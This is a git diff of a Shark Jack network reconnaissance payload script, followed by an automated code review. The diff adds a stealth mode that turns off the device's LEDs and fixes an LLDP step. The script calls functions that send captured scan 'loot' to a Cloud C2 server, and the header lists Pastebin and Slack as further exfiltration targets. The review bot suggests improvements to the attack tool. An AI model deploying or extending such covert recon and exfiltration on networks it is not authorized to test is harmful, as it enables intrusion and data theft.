commit
8488e7594f
|
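--- a/payload.sh
+++ b/payload.sh
@@ -1,12 +1,16 @@
 #!/bin/bash
 #
-# Title: network_recon.sh
-# Description: Swiss knife network reconnaissance payload with options for SSH server, Cloud C2 exfiltration
-# and led blinking for IP address, payload is based on various sample payloads from HAK5, MonsieurMarc,
-# Topknot and others. This payload script has been organized in a way it is easy to be extended with
-# additional recon (attack) functions.
-# Author: Robert Coemans
-# Version: 1.0 (19-08-2020)
+# Title: payload.sh
+# Description: Swiss knife network reconnaissance payload with options for loot capturing (e.g. DIG, NMAP, IFCONFIG, ARP-SCAN, LLDP),
+# notification (e.g. Homey, Pushover (the best push notfications service!), Slack), exfiltration (e.g. Cloud C2, Pastebin,
+# Slack) and led blinking for IP address. Payload is based on various sample payloads from HAK5, MonsieurMarc, Topknot and
+# others.
+# The script has been created in a modular fashion which allows easy extending the script with new functions (e.g. recon,
+# notification or exfiltration functions). The script furthermore incorporates logic to determine already existing loot
+# folders and create a new (unique) loot folder every time the script is executed.
+# Author: Robert Coemans (robert[at]brainstoday.com)
+# Version: 1.0 (19-08-2020), initial version
+# 1.1 (21-08-2020), added Stealth Mode and fixed LLDP attack function
 # Category: Recon
 #
 # Dependencies: this payload requires you to have the following packages already installed and configured via 'opkg install' (do 'opkg update' first):
@@ -38,16 +42,13 @@
 # - "-Pn" No ping
 # - "-O" Enable OS detection
 # - "-A" Enable OS detection, version detection, script scanning and traceroute
-#
-# To do / to be fixed
-# - Function to find neighbouring subnets
-# - LLDPCLI not working with Unifi
 
 # ****************************************************************************************************
 # Configuration
 # ****************************************************************************************************
 
 # Setup toggles
+STEALTH_MODE=false
 CHANGE_HOSTNAME=false
 CHANGE_MAC_ADDRESS=false
 LOOKUP_SUBNET=true
@@ -366,6 +367,11 @@ function GRAB_LLDP_LOOT() {
 if [ "$GRAB_LLDP_LOOT" = "true" ]; then
 LLDP_LOOT_FILE=$LOOT_DIR/lldp.txt
 touch $LLDP_LOOT_FILE
+# Assign LLDPD to eth0 and restart the LLDPD service (without this it will fail)
+lldpd -I eth0
+sleep 5
+/etc/init.d/lldpd restart
+sleep 5
 echo "****************************************************************************************************" >> $LLDP_LOOT_FILE
 echo "LLDP neighbor details (lldpcli show neighbor details)" >> $LLDP_LOOT_FILE
 echo "****************************************************************************************************" >> $LLDP_LOOT_FILE
@@ -620,7 +626,11 @@ function BLINK_INTERNAL_IP_ADDRESS() {
 # ****************************************************************************************************
 
 # Setup
+if [ "$STEALTH_MODE" = "true" ]; then
+LED OFF
+else
 LED SETUP
+fi
 CREATE_SCAN_FOLDER # Checks loot folder with highest index number in loot root folder and creates the next loot folder for current scan
 INITIALIZE_LOG_FILE # Initialize the log file
 SET_NETMODE # Set NETMODE to DHCP_CLIENT (for SharkJack v1.1.0+)
@@ -637,7 +647,9 @@ RECON_STARTED_NOTIFICATION
 START_CLOUD_C2_CLIENT
 
 # Attack
+if [ ! "$STEALTH_MODE" = "true" ]; then
 LED ATTACK
+fi
 GRAB_IFCONFIG_LOOT
 GRAB_TRACEROUTE_LOOT
 GRAB_DNS_INFORMATION_LOOT
@@ -649,7 +661,9 @@ GRAB_NMAP_INTERESTING_HOSTS_LOOT
 GRAB_DIG_LOOT
 
 # Finish
+if [ ! "$STEALTH_MODE" = "true" ]; then
 LED STAGE2
+fi
 echo "Free diskspace after actions: $(df -h | grep overlayfs | awk {'print $4'})" >> $LOG_FILE
 echo "Recon script took $SECONDS seconds" >> $LOG_FILE
 EXFIL_TO_CLOUD_C2
@@ -662,9 +676,10 @@ sync # Sync filesystem in order to prevent data loss
 # Prevent logging after this line!
 # ****************************************************************************************************
 
+if [ ! "$STEALTH_MODE" = "true" ]; then
 BLINK_INTERNAL_IP_ADDRESS
 LED FINISH
+fi
 if [ "$HALT_SYSTEM_WHEN_DONE" = "true" ]; then
 halt
 fi
-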
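Review bot: In the GRAB_LLDP_LOOT hunk the new `lldpd -I eth0` and `/etc/init.d/lldpd restart` lines run unconditionally, with no check that lldpd is installed or that either command succeeded, so on a device missing the package (it is only listed under Dependencies) the function still sleeps twice and appends nothing but the banner lines to lldp.txt; the function starts before the hunk and its lldpcli call comes after it. A guard in front of the daemon start, such as `command -v lldpd >/dev/null || { echo "lldpd not found, skipping LLDP loot" >> $LOG_FILE; return; }`, makes a missing tool visible in the log the rest of the script already writes to instead of producing an empty loot file. The interface is also hard-coded as `eth0` here, which belongs with the other toggles as a variable rather than inline. Separately, `STEALTH_MODE=false` is added to the setup toggles without a comment, and in every hunk shown it gates only LED calls, so a one-line comment such as `STEALTH_MODE=false # true: keep all LEDs off during the run (LED output only)` would stop an operator reading a reduced network footprint into the name; if it is meant to do more, that logic is outside this diff.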